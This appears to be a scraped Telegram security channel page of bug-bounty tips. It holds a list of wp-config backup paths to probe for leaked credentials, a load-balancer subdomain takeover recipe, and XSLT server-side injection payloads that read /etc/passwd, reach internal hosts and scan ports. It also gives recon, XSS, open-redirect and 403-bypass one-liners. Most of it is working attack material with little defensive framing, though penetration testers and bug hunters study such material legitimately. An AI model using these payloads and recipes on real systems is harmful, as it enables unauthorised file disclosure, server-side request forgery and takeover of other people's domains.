Brut Security
14.7K subscribers
914 photos
73 videos
287 files
970 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
🚨Here is a list of WP-exposed (wp-config sensitive) files!🚨

/wp-config.php-backup /wp-config.php.orig
/.wp-config.php.swp
/wp-config-sample.php /wp-config.inc /wp-config.old /wp-config.txt
/wp-config.php.txt
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.dist
/wp-config.php.inc
/wp-config.php.swp
/wp-config.php.html
/wp-config-backup.txt
/wp-config.php.save
/wp-config.php~
/wp-config.php.original
/_wpeprivate/config.json
πŸ‘10❀3πŸ”₯3
πŸ‘‰NipeJS is a powerful tool designed to detect JavaScript leaks through precise regex pattern scanning, streamlining the identification of potential data leaks within code.

πŸ“₯https://github.com/i5nipe/nipejs
πŸ”₯3πŸ‘2
🚨Tools collection🚨

Subdomain enum tools we can use!
1. bbot
2. amass
3. crt.sh
4. source codes
5. knockpy
6. subfinder
7. aquatone
8. subdomainzer
9. altDNS
10. Security Trails api

Bruteforcing tools we can use !
1. Go-buster
2. dirsearch
3. ssb - ssh brute
4. Callow -custom tools for logins
5. Ncrack - network

Spidering tools we can use !
1. Spider in Burp
2. Paramspider
3. Scarpy
4. Go_spider
5. aspider
6. ParamPAMPAM

Dir Enum tools we can use !
1. Dirb
2. Gobuster
3. Dirsearch

Wordlists we can use !
1. seclists
2. Assetnote
πŸ‘14❀7πŸ”₯3
This media is not supported in your browser
VIEW IN TELEGRAM
How to find Broken Authentication in 30 seconds or less using Autorize

πŸ‘‰Setup Your Autorize in Burp

1. Proxy traffic through Burp
2. Browse the application
3. Select requests -> Extensions -> Autorize -> Send to Autorize
4. Check the "Unauthenticated" tab and column
πŸ‘8πŸ”₯2
🌟Load Balancer Takeover🌟

Step 1: Identify .trafficmanager.net subdomains. πŸ•΅οΈβ€β™‚οΈ

Step 2: Use your Azure subscription to access the Traffic Manager profile. 🌐

Step 3: Create a resource with the vulnerable *.trafficmanager.net cname. πŸ› οΈ

Step 4: Add an endpoint for redirection to your desired site. πŸ”„
πŸ”₯4❀2πŸ‘1
🌟XSLT Server Side Injection🌟
(Extensible Stylesheet Language Transformations) - Part 1

The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).

 1.⁠ ⁠Read Local File: read.xsl
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:abc="https://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>

 2.⁠ ⁠SSRF
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:abc="https://php.net/xsl" version="1.0">
<xsl:include href="https://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>

OR

<esi:include src="https://10.10.10.10/data/news.xml" stylesheet="https://10.10.10.10//news_template.xsl">
</esi:include>

3. Javascript Injection
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>confirm("We're good");</script>
</xsl:template>
</xsl:stylesheet>

4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:php="https://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="document('https://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
πŸ”₯7πŸ‘2❀1
This media is not supported in your browser
VIEW IN TELEGRAM
🌟Find JS Endpoints With 1-Click🌟

1. Add a Blank Bookmark on your browser.
2. Add this Regex(https://0-a.nl/jsendpoints.txt) in URL Section.
3. Now open any site and click on your bookmark!
πŸ”₯9πŸ‘2
This media is not supported in your browser
VIEW IN TELEGRAM
Remote Code Execution via Local File Inclusion POC by Abhishek Morla
πŸ‘6πŸ”₯4
This media is not supported in your browser
VIEW IN TELEGRAM
USB Forensics 🀯🀯
❀7πŸ‘2🫑1
XSS Checks Made Easy 🌐

Example: Execute XSS checks on a list of URLs with a single command.

One-Liner: cat urls.txt | dalfox pipe --multicast -o xss.txt 


Uncover Hidden Parameters in Seconds πŸ•΅οΈβ€β™‚οΈ

Example: Extract hidden parameters from URLs effortlessly.

ONE LINER: 
cat alive.txt |rush curl -skl β€œ{}” |grep β€œtype\=\”hidden\”” |grep -Eo β€œname\=\”[^\”]+\”” |cut -d”\”” -f2 | sort -u’ | anew params.txt


Reveal Secrets in JavaScript Files πŸ•΅οΈβ€β™‚οΈ

Example: Identify sensitive data in JavaScript files like a pro.

One-Liner: 
cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder


Crush Directories with Effortless Bruteforce πŸ”

Example: Discover hidden directories and files effortlessly.

One-Liner: 
cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt


Expose Log4J Vulnerabilities with Ease πŸ”

Example: Identify Log4J vulnerabilities on the fly.

One-Liner: 
cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u @"


Hunt Down Sneaky Open Redirect🎯

Example: Uncover open redirects like a seasoned hunter.

One-Liner: 
gau https://vuln.target.com | gf redirect | qsreplace β€œ$LHOST” | xargs -I % -P 25 sh -c β€˜curl -Is β€œ%” 2>&1 | grep -q β€œLocation: $LHOST” && echo β€œVULN! %”’


Capture Screenshots in a Snap πŸ“·

Example: Capture screenshots of live websites effortlessly.

One-Liner: 
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'


Know Your WordPress Version πŸ“

Example: Discover the WordPress version of a target website instantly.

One-Liner: 
curl -s 'https://target.com/readme.html' | grep 'Version'


Unearth Subdomains Containing JavaScript 🌐

Example: Find subdomains with JavaScript files in a snap.

One-Liner: 
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS


Bypass 403 Login Pages with Finesse πŸšͺ

Example: Bypass 403 login pages like a pro.

One-Liner: 
cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent
πŸ‘6πŸ”₯3
This media is not supported in your browser
VIEW IN TELEGRAM
🌟Fuzzing and Bypassing the AWS WAF to trigger XSS🌟

πŸ‘‰Tool - https://lnkd.in/gk4-_4yw
πŸ‘‰Blog - https://lnkd.in/g4W7eA7R
❀4πŸ”₯2πŸ‘Ž1
Bug Bounty Checklist and Cheatsheets
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf

Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf

Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html

File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf

IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b

XSS-https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet

XXE-https://link.medium.com/lprTDcXRYgb

SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery

2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view

CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration

Business Logic Flaws-https://link.medium.com/MX5hzfESYgb

CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery

Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/

Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning

HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding

Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

SAML-https://github.com/e11i0t4lders0n/SAML-SSO

Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html

S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007

Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection

WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
πŸ‘10πŸ”₯4❀3
🌟Find Waybackurls JS Endpoints With 1-Click🌟

1. Add a Blank Bookmark on your browser.

2. Add this Regex in URL Section.
javascript:(function() {  var currentURL = encodeURIComponent(window.location.hostname.replace(/^www\./, ''));  var newURL = 'https://web.archive.org/cdx/search/cdx?url=%27 + currentURL;  window.open(newURL, %27_blank%27);})();


3. Now open any site and click on your bookmark!
❀13πŸ”₯3πŸ‘1
JSChecklist.pdf
65.2 KB
❀7πŸ”₯1
❀8πŸ”₯1